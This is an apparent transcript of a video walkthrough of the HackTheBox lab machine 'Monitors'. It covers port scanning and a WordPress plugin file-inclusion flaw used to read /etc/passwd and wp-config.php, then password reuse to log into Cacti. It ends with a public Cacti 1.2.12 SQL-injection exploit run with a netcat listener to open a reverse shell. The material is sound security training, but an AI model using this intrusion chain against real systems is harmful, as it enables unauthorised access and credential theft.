Hey guys, what's up? This is Mohammad Badruddin and today we are going to cover a machine from Hackthebox and the machine name is Monitor. Difficulty is hard. Before going to the machine, a warning for you, this video and its content are only for educational purpose and I do not support any unethical or illegal act. That's been said, let's go to the machine. The machine name is monitors, IP is 10.10.10.238 and my IP is 10.10.14.52, right? So first thing first is I'm going to use Nmap. Uh, Desktop monitors and I'm gonna do Nmap space hyphen S V or we can make VV as you want. So SC and the IP because I already added that machine in my host list. So I am going to say monitors.hackthebox and space hyphen O capital N. I'm going to say default.nmap. So this is going to be the nmap scan because I already did that scan. So I'm just going to open that scan for you. So as we can see, there are only two ports open. Uh, so first one is 22 for the SSH and its version is OpenSSH 7.6 P1 Ubuntu. Fine. And the second port is port number 80. This is open. Fine. That seems good. So now I'm going to take a screenshot and select a region and I'm going to select this like that and copy this going to cherry tree and inside monitor I'm going to create nmap bold. Okay, and inside that I'm going to paste. Fine. Okay. Next thing what I can do is as we can see the port number 80 is open, so I am going to access the port number 80. So monitors.hackthebox. Okay. So welcome to monitor and welcome to monitor. There is a post or maybe a blog from the admin user. Yeah, post by admin user and it said welcome to monitor where you can monitor our processes as we develop our site and tools. And copyright and iconic one theme that is powered by WordPress. It means this website built on the WordPress. This is very good lead we got, so we are going to scan this website with WP scan. So clear this and clear this and WP scan space hyphen H. When it's come, I will wait for that and I am going to make uh, view page source. So if you go to view page source to see the page source, what is in it? So monitors.hackthebox, xml.php. So monitors. Okay, open link in a new tab. XML post only. Okay. So next thing is welcome to monitor and where client ID is nothing, redirect to monitors WP content as we know because this website built on the WordPress, so you will found a lot of directories named as WP hyphen something. So WP hyphen content plugins and WP with spreads and wp.spreads.login. So I think this is a plugin. So this one is also for me important. So I'm gonna take a screenshot and okay, copy in the cherry tree and I am going to paste this. Fine. Next thing. Okay, so monitor, Hackthebox, hello world. Let's open this one also, and we will see what is there. So okay, here you can post the leave the reply. Fine, this is also good because here you cannot wait. Recent post by admin, nothing much here. So we found this one also. Next, let's see. So hello world, we already see that. Wordpress.org and wp embed.js. This is the Java file. So, and you can see here also wp spread assets header and all. So this is a plugin it's using here. Next thing, I'm going to wp scan. Okay, so let's see. wp scan space hyphen URL, and it's gonna be http://monitors.hackthebox. Next thing, I'm going to enumerate space hyphen e vulnerable themes, comma, another thing is all plugins and username we can also enumerate. And one thing I want to show you that here maybe the user is admin because this post is posted by admin user, so admin may be there. Another thing, detection mode. So I am also gonna check the detection mode. So there are three modes: mixed, aggressive, and the passive. And we will use the mixed one. Okay. And what else we can use? I think better than detection mode, we can use the plugins detection because we see there is one plugin it is using. So version also. Okay, so we are going to use this one and paste here. And the mode I'm going to use is mixed. Fine. Okay, so let's go. I'm going to make it a bit smaller and clear this one. Another thing I'm going to use is desktop and monitor. I'm going to use Nikto also because with WordPress sometimes it's very good. So http://monitors.hackthebox, just this. Okay, so here WP scan already scanned something for us. So let's see what we got here. XML RPC enabled and make it, the WordPress version is 5.5.1. The version is out of date for what? For theme. Which theme? Iconic one. Okay. CSS style in home, 50% confidence, and here it did the vulnerable theme enumeration, got nothing and no theme found. So let's see. Okay, so in WordPress we do not find much. Okay, but what we find from plugin, so we can see this this one. So we got a path. I am going to use plugins. I'm going to take to here, go there, paste, enter, and there is a directory named as WP with spreads, and inside we have few directories and files. So I'm going to go and read readme.txt. Okay, wp with spreads yokoko. Is this a version? No, I'm looking for a version actually, so that I can search this plugin with the version. Maybe there is a vulnerability in this plugin. So change log. Oh, yeah, maybe this one is the version. So we can just search WordPress. Sorry, plugin and spritz 1.0 exploit. Sorry, first check this vulnerability if there is any. So as you can see here, it said that local or remote file inclusion vulnerability is there, and inside exploit db it has the uh, vulnerability exploit is there. Let's see with the search exploit. Invalid IP. Okay, sorry, because I make spelling mistake. It should be monitors. Yeah. So I'm going to clear WP scan because we do not find much. And here I'm going to search exploit spreads 1.0, and yeah, there is vulnerability and there is an exploit. So I'm going to take a screenshot and I'm going to put it in the cherry tree, paste. Okay, so let's see, I'm going to search exploit space -m and this value 444.php, and let's see what's in that file. So it said exploit remote file inclusion. Fine. This is the date for the exploit. Version disclosure, you can read this. So absolutely we read this file and we found 1.0 version is there. So this vulnerability, remote file inclusion, is there in this plugin because of this little piece of code. So what this code is doing, it is creating a parameter named as URL, and it make the get request getting anything whatever you define as value of this parameter, it will get, and what it will get the contents. So if you provide the value of this parameter URL is something like a path of a file, so it will get the content of that file. So this is the problem here. Now how we can and where we can exploit this vulnerability, we need to follow this path. So let's see, this is the path, right? Okay, so first of all I am, where is it, this one, so okay, turn on the web proxy and not HTML. I'm going to open this file, PHP file, and as you can see we got here, and I think this is the URL what we need to follow, right? WP with spreads.content filter.php. So we have filter.php, and yeah, okay. So I'm going to send this request to the repeater, go to the repeater, and I'm going to add this parameter URL equal to, and what it gave, yeah. So I'm going to copy this and paste this here, enter, and as you can see we got the etc password content. So there is a password file in Linux inside the etc directory where you can see all the users with their user ID, group ID, and which bash or sh what they can run. Okay, so if you see closely, you will find this Marcus user have ID 1000, and it has the home directory home/Marcus, and another I think do not have. So it means we have two valid users, local system user, that is root, and other one is Marcus. All other users like SSHD, MySQL, and www data, these all comes with the service when once you install the service, right? So this part you also need to make note on this. Okay, so I'm gonna take print. Okay, get this from here to here. Fine. Okay, and go to the cherry tree. This. Yeah, that's better. Save it. Now, what else we can do here? Uh, we got the valid username. Now, of course, because one thing we can do, because this is WordPress, so let this run. We can actually read any system file from here, maybe because whatever system files, whatever is in the Apache or is in the WordPress, we can read, I think, because maybe this user is www data, right? So first of all, I would like to read the WordPress configuration file. So because I do not work much with WordPress, so I wanna say WordPress configuration file location. Let's see why I want to read the config file, because in the config files database connections are there. Okay, so maybe we can find the database credentials or the user credentials, something like this. So editing wp config.php. So open this file, let's see what's in it, and I want to turn off the proxy here. Okay, so so this file actually contains these things. So all this information you will find in the config file. That's why I'm curious to read that file. So database username, database password, database host, if there is any. Okay, and you will see something like this. So let's see if we get the exact path of that file. This is for MySQL. Okay. Okay, without wasting time, let's just see. Maybe we will get like that. So I'm gonna do slash config dot php. This is the file name, right? Or something else. Where is it coming? wp config.php. So wp-config.php, send 200, but there is no content, so maybe we need to do something like this. No. Okay, go further. No. Okay, go further. Wait. So like this, it will actually switch the directories, and as you can see, because we cannot see the present working directory, so we need to test like this. So now as you can see, we got the file, and there are so much to know, and authentication keys are there. Very good. So let's see, I'm going to right click, show the response in the browser, copy, make sure your web proxy is on, go to anyone here and just paste like that, enter, and it's not good. So I'm going to see the page source. This is good. Now I'm going to copy all copy and paste it in a separate file so that we can later see this. Fine. So I'm going to say wp-config.php, and what we have is this is the most important part. So I'm going to take a note for this by print screen. Okay, and I'm going to take this, not actually print screen, and I'm going to take it from here, from this to this. Okay, go to the cherry tree and paste, save. Fine. So what we have now, we have username. So the first username we got is admin from the app. The second username we got Marcus, and root, of course, this is the system user. The third thing we got from here, DB user, and the database name is Wordpress. So I'm gonna say DB name is Wordpress, DB underscore user is WP admin. Okay, what next? DB password, and what is the password? So we need to copy it from here. So copy and paste it here. And localhost, we don't need that. Okay, because this service is not running on the internet facing network, internet facing interface. So it's running on the localhost. Okay, once we get the user, then we can see this service. Fine. So let's see, and we will try the SSH with this password, because sometime administrator pass the same password for the user, system user, for the local services and all. So maybe this works. So I'm gonna copy this, come here, and yeah, so I'm going to try SSH Marcus at monitors.hackthebox. Okay, so password is, I already paste selection, enter. No, not working. Paste selection again. So unfortunately, administrator did not make that mistake before few moment what I am explaining. So next thing what I can do, because I cannot, let's see if I get something here, because there is space hyphen wp hyphen admin, something like this. There is a directory for WordPress where you will find the authentication page. So index author admin, no luck. WP space admin hyphen login, no. So that may be not there. So let's read something else. As you can see, in the Nmap scan, we found port number 80 is open, and the service is running Apache HTTPD 2.4.29. We can also read the files, configuration files of Apache, because see, in this situation, you cannot log in with the SSH, right? And you have only Marcus user, so you cannot try another user for this. Two things you can do. The first thing you can do is you can brute force with the Hydra or with another tool. You can brute force the SSH for Marcus user to get the password. Another thing, because we already have the vulnerability of remote file inclusion or local file inclusion, we can read the file. So why not we can read the Apache config file as we read the WordPress configuration file, right? So for this, if you do not know the path for the Apache files, I will show you. So let's say ls-la. The first thing you must know, the configuration file of Apache is inside etc Apache 2. Okay, so these are the files here. This is the actually directory. Okay, so the first file is apache.conf. Then you have a directory, conf available, conf enabled, environment variables, magic, mods available, mods enable, ports.conf, and these two directories, right? So let's see, we will read one by one and we will see what is in these files. So uh, instead of reading here, we can create actually a file new. So the first thing is etc slash apache2 slash apache2.conf, apache2.conf. Okay, next thing I'm going to, another file is envar and magic. So this path is same, paste and paste env vars and magic, and what else, paste. This is the directory, mod available, mod enables. Okay, first I will put this ports.config, ports.config, right? Sorry, it's conf, not config. Another thing, okay, now we will see what is in these directories, right? So first of all, I'm going to make same command but with sites enabled. Okay, so in this file there is a, in this directory there is a file 000 default.conf. So I'm going to copy this and sites hyphen enabled or uh, enabled, yes, and paste this. Okay, another thing, I can go inside sites available and there are also these files. So I'm going to copy this, paste it here, and these are the files. So copy, paste, uh, copy, paste, default ssl.conf. I don't think there is anything with this file on the target machine because, okay, next is mode enabled and mode. So let's see, mod uh, enable, sorry, enabled, and there are a lot of files, mod enable, auth basic, authenticate, and all these link file. Okay, status.conf. So these are not very interesting because the configuration for these files does not contain username and passwords or the, if there is a website hosting in the shared, so maybe virtual hosting is there, so these kind of configuration are only you will find in these files. So I'm going to keep that file with me and I'm going to check all these files one by one. So first thing, I'm going to copy this and go to my web proxy, just going to change this, paste here, and let's send. So as you can see, uh, the file is correct, same file with the same path available on the target machine also. And you can see mod ssl.c default is 443. This is the port, server admin webmaster, because there is uh, no custom configuration. This is the default configuration, right? So okay, PHP find virtual host. No, so there is nothing. Let's check this file. So copy, and I am going to paste it here. Paste, send, and let's see. Default virtual hosting monitor.hackthebox.conf and cacti. What is that? Cacti admin monitors.hackthebox.conf. Wait a moment. And admin at monitor.hackthebox. This is the file which is configured, I think, because by default there is no monitors.hackthebox, right? And also there is some message. So uh, if we take out this .config, what we have rest is the domain name. So this domain name we already know, and I think we find the new domain, right? So just copy this and paste it on my file. So just wait a moment, and I add this and come back, right? So welcome back. I already added that subdomain in my host file because I don't want to show my host file because there are a lot of things. So yeah, okay, let's go and try to access that new host. HTTP with the HTTP, yeah, because it's on port number 80. It seems working very good, and we got a authentication page. So let's see what username and passwords we have. Up to now is admin, Marcus, and root. So I'm going to take this admin, copy, paste it here, and the password I'm going to use this one, copy and paste it here, login, and yes, we logged in. Good job. Now uh, logs console, what is it all about? I don't know, because first time I see something like this, but whatever is that, main console, same, create new graphics, new device, uh, SNMP uptime. We need to read about this devices. It is some kind of panel on which you can add many devices, and you can manage and monitor from the centralized management and centralized monitoring system. I think that's why this machine name is monitors. Yeah, that makes sense. So local machine status is unknown. Okay, I'm going to start burp suite and local machine. Fine, ID is equal to 1. And yeah, this machine seems like already added. Why I open the burp suite? Because this URL looks interesting to me, and I'm going to proxy. Where are you? Yeah, here. And this one. So I'm going to send this to the repeater. Go to the repeater and just try. I want to try this, and we got something. Yes. Let's see. Enter. Yes. Yes. So I think SQL injection vulnerability is there. I don't know about this application because this is my first time I'm using it, but 100% there is SQL vulnerability. What else we can try? Let me, or 1 equals to 1, enter. Still. So let me check this. What is the application name? It seems like console device. I'm going to see the page source. Okay, so modern, enter search term, regular expression, graphic view filter. Interesting. Get include. Okay. Where Cacti version 1.2.12. I think the application name is Cacti. I don't know how to pronunciate this. And CSRF magic token SID, and this is the value. So I'm going to search about this. Just close this. First of all, I go to search exploit Cacti version 1. What was the version? Wait. Here it goes. Version 1.2.12. And yes, very good. There is SQL injection vulnerability with remote code execution or remote code execution. Yeah, both of these could work. So I think the remote code execution through the SQL injection vulnerability. Fine. So let's take this file search exploit space -m to copy this file from this path, and just you need to specify the 49810.py, and this exploit is written in the Python. So let's see what is in that exploit. This one. Okay, so let's run this script and we will see. Okay, so to run this script, it needs few arguments. So the first argument is space -t, the target. So the target is gonna be http://cacti-admin.monitors.hackthebox, and second thing is username. So username is gonna be admin because we logged in with admin, right? And the password is where is it? Here, yeah. Copy and paste it here. And the third is it needs --lhost. So lhost means my IP 10.10.14.52, and space --l port means the local port, and my port is gonna be 9090. I'm going to start here. nc space -nlvp 9090. Enter and enter this. So got the CSRF token, and it takes the hashed value of admin guest, and yeah, we got the reverse shell. Fine. So let's see. Python 3 space -c colon import, single quote import and pty dot spawn, and I'm going to take /bin/bash, double quotes close and single quote enter, and yes, as you can see, so yeah, we already got it. Yeah, and exit this one. So as you can see, we got the www user and reverse shell. Let's see, who am I is this, ID is this, and the host name to verify monitors, right? So we got the reverse shell. In the next video, we will see how we can make privilege escalation and how we can get root. So for this video, it's enough. I don't want this video make too long. So see you in the next video. Thank you.